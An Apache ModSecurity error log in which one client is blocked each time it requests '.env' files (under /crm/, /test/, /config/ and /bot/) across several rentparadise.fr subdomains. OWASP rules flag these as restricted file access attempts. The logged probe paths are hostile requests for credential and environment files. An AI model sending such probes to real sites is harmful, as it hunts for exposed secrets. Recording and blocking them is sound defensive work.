[Mon May 11 13:32:12.835643 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-POSQ-m-m0ukSShtdsgAAAUs"]
[Mon May 11 13:32:12.835843 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-POSQ-m-m0ukSShtdsgAAAUs"]
[Mon May 11 13:32:12.836030 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdsgAAAUs"]
[Mon May 11 13:32:12.857914 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtAAAAUs"]
[Mon May 11 13:32:12.858108 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtAAAAUs"]
[Mon May 11 13:32:12.858296 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdtAAAAUs"]
[Mon May 11 13:32:12.859313 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-POJEyNRN152ArORluQAAAEM"]
[Mon May 11 13:32:12.859467 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-POJEyNRN152ArORluQAAAEM"]
[Mon May 11 13:32:12.859652 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORluQAAAEM"]
[Mon May 11 13:32:12.872692 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdAAAAMg"]
[Mon May 11 13:32:12.872915 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdAAAAMg"]
[Mon May 11 13:32:12.873120 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vdAAAAMg"]
[Mon May 11 13:32:12.881590 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtQAAAUs"]
[Mon May 11 13:32:12.881744 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0hQAAAAA"]
[Mon May 11 13:32:12.881835 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtQAAAUs"]
[Mon May 11 13:32:12.881927 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0hQAAAAA"]
[Mon May 11 13:32:12.882040 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdtQAAAUs"]
[Mon May 11 13:32:12.882134 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0hQAAAAA"]
[Mon May 11 13:32:12.883216 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-POJEyNRN152ArORlugAAAEM"]
[Mon May 11 13:32:12.883365 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-POJEyNRN152ArORlugAAAEM"]
[Mon May 11 13:32:12.883546 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlugAAAEM"]
[Mon May 11 13:32:12.895454 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdQAAAMg"]
[Mon May 11 13:32:12.895693 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdQAAAMg"]
[Mon May 11 13:32:12.895886 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vdQAAAMg"]
[Mon May 11 13:32:12.904125 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtwAAAUs"]
[Mon May 11 13:32:12.904332 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-POSQ-m-m0ukSShtdtwAAAUs"]
[Mon May 11 13:32:12.904528 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdtwAAAUs"]
[Mon May 11 13:32:12.906211 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0hgAAAAA"]
[Mon May 11 13:32:12.906223 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-POJEyNRN152ArORluwAAAEM"]
[Mon May 11 13:32:12.906411 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/test/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0hgAAAAA"]
[Mon May 11 13:32:12.906416 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-POJEyNRN152ArORluwAAAEM"]
[Mon May 11 13:32:12.906600 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0hgAAAAA"]
[Mon May 11 13:32:12.906606 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORluwAAAEM"]
[Mon May 11 13:32:12.918194 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdgAAAMg"]
[Mon May 11 13:32:12.918395 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vdgAAAMg"]
[Mon May 11 13:32:12.918575 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vdgAAAMg"]
[Mon May 11 13:32:12.929396 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-POJEyNRN152ArORlvAAAAEM"]
[Mon May 11 13:32:12.929564 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/bot/.env"] [unique_id "agG-POJEyNRN152ArORlvAAAAEM"]
[Mon May 11 13:32:12.929749 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORlvAAAAEM"]
[Mon May 11 13:32:12.930285 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/config/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0iAAAAAA"]
